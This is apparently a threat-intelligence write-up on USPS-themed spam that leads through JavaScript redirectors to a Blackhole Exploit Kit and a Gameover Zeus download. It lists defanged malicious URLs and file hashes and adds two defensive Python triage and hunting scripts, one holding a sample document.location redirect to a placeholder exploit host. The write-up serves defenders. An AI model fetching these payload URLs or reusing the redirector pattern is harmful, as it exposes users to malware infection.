USPS themed spam

Your USPS delivery.
USPS postage invoice.
USPS postage labels receipt.

movie-watch-online[.]com/psaea9uq/index.html (hosted at IP address
grimper.awardspace[.]com/m4QmPyqG/index.html (hosted at IP address
[.]co/zngqs0Ts/index.html (hosted at IP address

[Screenshots of the three spam emails: "USPS postage labels receipt", "Your USPS delivery", "USPS postage invoice"]

The text ‘Clink-N-Ship Account’ contains hyperlinks to the compromised websites listed above. These pages contain no content other than five JavaScript includes:


These JavaScript redirectors contain the following document.location script, which sends victims to a Blackhole Exploit Kit at


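As an added defender-side example (not code from the original post), the following Python script profiles a fetched HTML page in the way an analyst would triage the compromised sites described above: a page with no visible text and nothing but script includes is flagged, and any script body is searched for a `document.location` assignment so the redirect target can be extracted for blocking. The sample pages, the script include paths and the redirect domain are constructed placeholders, not the real landing page or exploit-kit URL.

```python
import re
from html.parser import HTMLParser

# Constructed sample of a compromised landing page of the kind described above:
# an otherwise empty page whose only content is a handful of script includes.
SAMPLE_LANDING_PAGE = """<html><head></head><body>
<script src="/psaea9uq/1.js"></script>
<script src="/psaea9uq/2.js"></script>
<script src="/psaea9uq/3.js"></script>
<script src="/psaea9uq/4.js"></script>
<script src="/psaea9uq/5.js"></script>
</body></html>"""

# Constructed benign page for comparison: real text plus one script include.
SAMPLE_BENIGN_PAGE = """<html><body><h1>Welcome</h1><p>Some real text.</p>
<script src="/static/app.js"></script></body></html>"""

# Constructed redirector body; the domain is a placeholder, not the kit URL.
SAMPLE_REDIRECTOR_JS = 'document.location = "http://exploit-kit.example/landing.php?x=1";'


class _PageProfile(HTMLParser):
    """Counts visible text characters and collects <script src=...> targets."""

    def __init__(self):
        super().__init__()
        self.text_chars = 0
        self.script_srcs = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            src = dict(attrs).get("src")
            if src:
                self.script_srcs.append(src)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Inline script bodies are not "visible text", so skip them.
        if not self._in_script:
            self.text_chars += len(data.strip())


def profile_page(html):
    """Return (visible_text_chars, [script src values]) for an HTML document."""
    p = _PageProfile()
    p.feed(html)
    return p.text_chars, p.script_srcs


def is_empty_script_only_page(html, min_scripts=3):
    """True when the page shows nothing and only pulls in script includes."""
    text_chars, srcs = profile_page(html)
    return text_chars == 0 and len(srcs) >= min_scripts


# Matches document.location / window.location(.href) = "<url>" assignments.
REDIRECT_RE = re.compile(
    r"""(?:document|window)\s*\.\s*location(?:\s*\.\s*href)?\s*=\s*["']([^"']+)["']"""
)


def find_location_redirect(js):
    """Return the redirect target of a location-assignment redirector, or None."""
    m = REDIRECT_RE.search(js)
    return m.group(1) if m else None


if __name__ == "__main__":
    print("landing page flagged:", is_empty_script_only_page(SAMPLE_LANDING_PAGE))
    print("benign page flagged:", is_empty_script_only_page(SAMPLE_BENIGN_PAGE))
    print("redirect target:", find_location_redirect(SAMPLE_REDIRECTOR_JS))
```

The text-length check is deliberately crude: it is a triage signal for a web-server owner or a URL-scanning pipeline, and a hit should be followed by fetching and reading the referenced scripts, not by automatic blocking on its own.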
It downloads the Gameover Zeus installer from the following location:

slickvenue[.]com/q.php?f=e0c3a&e=2

File: contacts.exe
MD5: f78dc4de518ce68db58c8cd663685266
Size: 286,744 bytes

It then installs Zeus in %APPDATA%, with the following properties:

File: weja.exe
MD5: d92d70b7b97a1c6552079890ccbfcbdf
Size: 284,184 bytes
Other: This file is digitally signed by ‘SDOkUGUnMWwv’
Company Name: Twain Working Group
File Description: Twain.dll Client’s 32-Bit Thunking Server
File Version: 1,7,0,0
Internal Name: Twunk_32
Original Filename: Twunk_32.exe
Product Name: Twain Thunker
Timestamp: 2011:10:03 18:46:52+02:00
This Gameover Zeus variant exfiltrated stolen data to dropzones at /index.php and /index.php.

The Gameover variant had a bot id of “ppcz20” and a cid of “3005”. The location of the backconnect proxies was at ; webinjects were pulled from the proxy at on TCP port 22005.
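As an added example for responders (not code from the original post), the script below turns the file indicators listed above (MD5 hashes, filenames and sizes of contacts.exe and weja.exe) into a simple hunt over %APPDATA%, the directory the write-up names as the install location. A hash match is treated as definitive; a filename or size match alone is reported only as a weak hint, since both are trivially changed between samples. The demo functions create constructed temporary files so the script runs offline; the real binaries are not needed.

```python
import hashlib
import os
import tempfile

# Indicators copied from the write-up above: MD5 -> (filename, size in bytes).
GAMEOVER_IOCS = {
    "f78dc4de518ce68db58c8cd663685266": ("contacts.exe", 286744),
    "d92d70b7b97a1c6552079890ccbfcbdf": ("weja.exe", 284184),
}


def md5_of_file(path, chunk=1 << 20):
    """Stream a file through MD5 so large files do not need to fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def hunt(root, iocs=GAMEOVER_IOCS):
    """Walk root and return [(path, md5, reasons)] for files matching any IOC.

    reasons contains 'md5' for a definitive hash hit, and 'filename' / 'size'
    for weak hints that should be confirmed by hand.
    """
    hits = []
    names = {name.lower() for name, _ in iocs.values()}
    sizes = {size for _, size in iocs.values()}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                size = os.path.getsize(path)
                digest = md5_of_file(path)
            except OSError:
                continue  # unreadable or vanished file; keep scanning
            reasons = []
            if digest in iocs:
                reasons.append("md5")
            if fn.lower() in names:
                reasons.append("filename")
            if size in sizes:
                reasons.append("size")
            if reasons:
                hits.append((path, digest, reasons))
    return hits


def default_root():
    # %APPDATA% on Windows, where the write-up says weja.exe is installed;
    # fall back to the home directory elsewhere so the script still runs.
    return os.environ.get("APPDATA") or os.path.expanduser("~")


def demo_filename_hint():
    """Constructed scenario: a file merely named like the dropper.

    Its content is made up, so the hash cannot match; only the weak
    'filename' hint is expected.
    """
    with tempfile.TemporaryDirectory() as d:
        p = os.path.join(d, "weja.exe")
        with open(p, "wb") as f:
            f.write(b"constructed sample, not the real binary")
        return [reasons for _, _, reasons in hunt(d)]


def demo_hash_match():
    """Constructed scenario: an IOC table built from a file we create ourselves,
    so that hash, filename and size all match and all three reasons fire."""
    with tempfile.TemporaryDirectory() as d:
        p = os.path.join(d, "sample.bin")
        data = b"constructed content for the hash-match demo"
        with open(p, "wb") as f:
            f.write(data)
        iocs = {hashlib.md5(data).hexdigest(): ("sample.bin", len(data))}
        return [reasons for _, _, reasons in hunt(d, iocs)]


if __name__ == "__main__":
    for path, digest, reasons in hunt(default_root()):
        print(path, digest, ",".join(reasons))
```

MD5 is used here only because those are the hashes the write-up provides; when building your own indicator set, record SHA-256 as well, since MD5 collisions are practical and vendors increasingly publish only stronger hashes.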

